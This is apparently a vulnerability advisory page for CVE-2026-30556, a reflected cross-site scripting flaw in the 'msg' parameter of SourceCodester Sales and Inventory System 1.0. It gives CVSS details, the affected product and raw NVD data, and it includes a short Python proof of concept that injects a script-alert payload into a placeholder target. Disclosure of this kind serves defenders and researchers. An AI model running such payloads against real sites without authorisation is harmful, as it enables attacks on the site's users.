Security Vulnerability Report
中文
CVE-2026-30556 CVSS 6.1 MEDIUM

CVE-2026-30556

Published: 2026-03-30 16:16:05
Last Modified: 2026-04-01 15:42:17
Source: [email protected]

Description

A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Sales and Inventory System 1.0. The vulnerability is located in the index.php file via the "msg" parameter. The application fails to sanitize the input, allowing remote attackers to inject arbitrary web script or HTML via a crafted URL.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:ahsanriaz26gmailcom:sales_and_inventory_system:1.0:*:*:*:*:*:*:* - VULNERABLE
SourceCodester Sales and Inventory System 1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# PoC for CVE-2026-30556 # The vulnerability exists in the 'msg' parameter of index.php import requests target_url = "http://target-ip/index.php" # Malicious payload to test script execution payload = "<script>alert('CVE-2026-30556_XSS')</script>" try: # Send a GET request with the payload in the 'msg' parameter response = requests.get(target_url, params={"msg": payload}) # Check if the payload is reflected un-sanitized in the response if payload in response.text: print("[+] The application is vulnerable to Reflected XSS.") print("[+] Payload executed successfully.") else: print("[-] Vulnerability not detected or payload was sanitized.") except Exception as e: print(f"Error: {e}")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30556", "sourceIdentifier": "[email protected]", "published": "2026-03-30T16:16:05.203", "lastModified": "2026-04-01T15:42:17.493", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A Reflected Cross-Site Scripting (XSS) vulnerability exists in SourceCodester Sales and Inventory System 1.0. The vulnerability is located in the index.php file via the \"msg\" parameter. The application fails to sanitize the input, allowing remote attackers to inject arbitrary web script or HTML via a crafted URL."}, {"lang": "es", "value": "Una vulnerabilidad de cross-site scripting (XSS) reflejado existe en SourceCodester Sales and Inventory System 1.0. La vulnerabilidad se encuentra en el archivo index.php a través del parámetro 'msg'. La aplicación no logra sanear la entrada, permitiendo a atacantes remotos inyectar scripts web o HTML arbitrarios a través de una URL manipulada."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ahsanriaz26gmailcom:sales_and_inventory_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "5A75B7A5-65D7-4AF9-BDE8-EBD496A4942B"}]}]}], "references": [{"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Inventory-System/XSS-Index-msg.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/meifukun/Web-Security-PoCs/blob/main/Inventory-System/XSS-Index-msg.md", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.